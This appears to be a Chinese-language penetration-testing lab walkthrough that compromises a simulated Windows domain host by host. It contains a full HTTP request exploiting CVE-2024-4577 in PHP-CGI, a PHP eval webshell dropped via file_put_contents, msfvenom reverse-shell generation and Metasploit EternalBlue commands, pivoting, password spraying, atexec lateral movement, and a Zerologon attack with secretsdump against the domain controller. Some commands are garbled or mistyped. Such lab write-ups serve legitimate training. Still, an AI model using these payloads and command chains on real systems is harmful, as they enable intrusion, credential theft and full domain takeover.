环境解释
环境搭建
项目下载:
链接: 百度网盘 请输入提取码 提取码: ga54
配置网卡:
vmware8/NAT 对应192.168.139.0网段
vmware2对应192.168.2.0网段
vmware3对应192.168.3.0网段
vmware10对应192.168.10.0网段
Windows Server 2012
登陆进去打开xampp服务
Windows 7
Windows 10
Windows Server 2012 R2(weblogic 单机)
Windows Server 2012-WEB
Windows Server 2016-AD-2016
打靶
windows server 2012
信息收集
全球首款利用PHP默认环境的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP,支持SSRF,支持绕过WAF。
XAMPP 渗透拿shell
打开网站80端口
全球首款利用PHP默认环境的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP,支持SSRF,支持绕过WAF。
payload
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: PhpVulnEnvREDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.139.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
<?php die("Te"."sT");?>
发现可以成功执行命令,但是想要反弹shell没有办法只用get,所以我们得尝试写入文件
查看phpinfo,发现当我们写入文件应该会放在\php\下
经过chatgpt的搜索,可以知道网站的路径在/htdocs/下,所有我们得把文件上传到这
<?php
file_put_contents("../htdocs/1.php", " <?php @eval($_POST['attack']);?>
"); ?>成功写入,然后将其改为后门的木马
成功写入连接
将其连接到cs(生成后门上传执行)
windows7
信息收集
端口扫描和探测
并且抓取明文的密码
发现129只有445端口
将fscan传上去
运行,发现
存在永恒之蓝
永恒之蓝漏洞
先将其转到msf上
或者直接用哥斯拉的传
或者直接生成msf的后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=5210 -f exe -o 5210.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.129
set lport 1234
run
建立路由
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
注意:因为这是内网网段的机器,所以我们只是单纯的区执行这个永恒之蓝漏洞是完全不行的,我们得先设置监听器,到 第一台的主机
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.2.134
set lport 4548
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.2.129
set rhosts 192.168.2.129
set lhost 192.138.2.134
set lport 4548
上传后门,然后再转发上线
成功上线
Windows10
密码喷射
再administrator
密码横向移动
windows server R2
发现7001端口,是weblogic,所以建立代理,访问
集成攻击一把梭
植入内存马
上线cs
windows server 2012 web
抓取密码,发现密码
尝试用密码横向移动,但是自身有防火墙,所以没办法使用反向上线,需要通过正向上线
、
不知道为什么我的这样子无法上线
先用ipc协议将文件共享
然后使用atexec来执行
成功上线
DC
net time /domain发现是在域内
先建立代理
改host文件为dc
cve 2020 1472 域控提权
清空密码
(在impacket里面)
python secretsdump.py "xiaodi.org/dc$@192.168.10.10" -no-pass
一般都是第一个administrator的第一个或者第二个
(域控是dc.xiaodi.org ,)
成功得到shell,然后将其上线cs
成功上线
